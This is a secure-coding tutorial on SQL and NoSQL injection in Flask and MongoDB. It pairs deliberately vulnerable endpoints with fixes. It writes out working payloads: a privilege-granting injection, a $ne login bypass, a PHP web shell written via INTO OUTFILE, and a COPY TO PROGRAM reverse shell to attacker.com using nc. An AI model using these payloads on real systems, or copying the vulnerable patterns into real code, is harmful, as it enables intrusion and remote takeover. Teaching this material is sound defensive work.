
Privilege Escalation

SQL Injection

# Vulnerable Flask endpoint
@app.route('/user/<int:user_id>')
def get_user(user_id: int):
    """Return every column of the ``users`` row with id *user_id* (vulnerable example).

    The SQL text is assembled with an f-string, which is the injection
    pattern this example exists to show.  Note that the route's
    ``<int:user_id>`` converter only dispatches here for an all-digit path
    segment, so the GRANT payload listed under this example would not reach
    this function as written; the same interpolation becomes exploitable the
    moment the parameter is free-form text or the converter is dropped.
    ``SELECT *`` also returns every column, so whatever the table stores
    (credential fields included) ends up in the JSON response.
    Fix: bind the value instead of formatting it, e.g.
    ``db.execute("SELECT * FROM users WHERE id = ?", (user_id,))``
    (placeholder style depends on the driver).
    """
    # Injection point: the parameter is spliced into the statement text.
    query = f"SELECT * FROM users WHERE id = {user_id}"
    result = db.execute(query)
    return jsonify(result.fetchall())

# Attack payload:
/user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--

NoSQL Injection

// Vulnerable MongoDB query
// Both filter values are taken verbatim from the request body.  With a JSON
// body a client can send an object instead of a string, and MongoDB treats an
// object such as {"$ne": null} as a query operator, so the filter matches a
// document without the real credentials being known.
// Mitigation: reject any non-string username/password before the filter is
// built.  The query also compares the submitted password directly with the
// stored field, which presumably means clear-text storage -- verify and hash.
db.users.find({
    username: req.body.username,
    password: req.body.password
});

// Attack payload (JSON):
{
    "username": {"$ne": null},
    "password": {"$ne": null}
}

Command Execution

MySQL Command Execution

-- sys_exec() is not a built-in MySQL function; it only resolves when a
-- command-execution UDF has been loaded into the server.  Hardening: the
-- application's database account should hold neither FILE nor CREATE
-- FUNCTION privilege, and the client driver's multi-statement support should
-- stay at its default (off) so a stacked ";" cannot begin a second statement.
SELECT * FROM users WHERE id = 1;
SELECT sys_exec('whoami'); --

-- Writing web shell: INTO OUTFILE needs the FILE privilege and a
-- secure_file_priv setting that permits writing to the target directory.
-- Hardening: keep secure_file_priv restricted (never empty), do not grant
-- FILE to the application account, and run mysqld as a user without write
-- access to the web root.
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php'; --

PostgreSQL Exploitation

# Vulnerable Flask code
@app.route('/search')
def search():
    """Return ``products`` rows whose name contains the ``q`` query parameter (vulnerable example).

    ``request.args.get('q')`` is attacker-controlled text that is interpolated
    straight into the SQL string; a single quote in ``q`` closes the LIKE
    literal and everything after it is parsed as SQL.  The payload listed under
    this example additionally relies on stacked statements and on the database
    role being allowed to run ``COPY ... TO PROGRAM`` (superuser or
    ``pg_execute_server_program``) -- an application role should never have
    that.  Fix: bind the pattern and keep the wildcards on the Python side,
    e.g. ``execute_query("SELECT * FROM products WHERE name LIKE %s", (f"%{query}%",))``
    (assuming execute_query forwards parameters to the driver -- confirm).
    """
    # None when 'q' is absent, so the literal text "None" gets searched for.
    query = request.args.get('q')
    # Injection point: the user value is spliced into the statement text.
    sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"
    return execute_query(sql)

# Attack payload:
/search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --

Secure Mitigation Strategies

SQLAlchemy ORM

# SECURE: Using SQLAlchemy ORM
@app.route('/user/<int:user_id>')
def get_user_secure(user_id):
    """Look up a user through the ORM and return its public fields as JSON.

    Returns an ``{'id', 'username'}`` document for a matching row, or an
    ``{'error': ...}`` document with HTTP status 404 when nothing matches.
    ``filter_by`` hands *user_id* to the database as a bound parameter, so no
    SQL text is assembled by hand and only the two listed fields are exposed.
    """
    record = User.query.filter_by(id=user_id).first()
    if not record:
        return jsonify({'error': 'User not found'}), 404
    public_fields = {'id': record.id, 'username': record.username}
    return jsonify(public_fields)

NoSQL Injection Prevention

# SECURE: NoSQL injection prevention
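def authenticate_user_secure(username, password):
    """Return the ``users`` document matching *username*/*password*, or ``None``.

    The NoSQL-injection defence is the type check: MongoDB interprets an
    object such as ``{"$ne": None}`` as a query operator, so both credentials
    must be plain strings before they are placed in the filter.  Both fields
    are checked -- a non-string *password* would otherwise be handed to
    ``hash_password`` unvalidated.

    Args:
        username: login name as submitted by the client.
        password: clear-text password as submitted by the client.

    Returns:
        The matching document, or ``None`` when either credential is not a
        string or no document matches.
    """
    # Reject operator objects ({"$ne": ...}) and any other non-string value.
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    # The previous version called re.escape(username) here.  That only escapes
    # regex metacharacters, which adds nothing against operator injection and
    # mangles legitimate names (e.g. "j.doe" -> "j\.doe") so they never match
    # the stored value.  In an equality filter a str is already a literal.
    # NOTE(review): matching hash_password(password) inside the query only
    # works if hash_password is deterministic (unsalted).  With a salted
    # scheme the document must be fetched by username and the hash verified
    # afterwards -- confirm which kind hash_password is.
    return db.users.find_one({
        'username': username,
        'password': hash_password(password),
    })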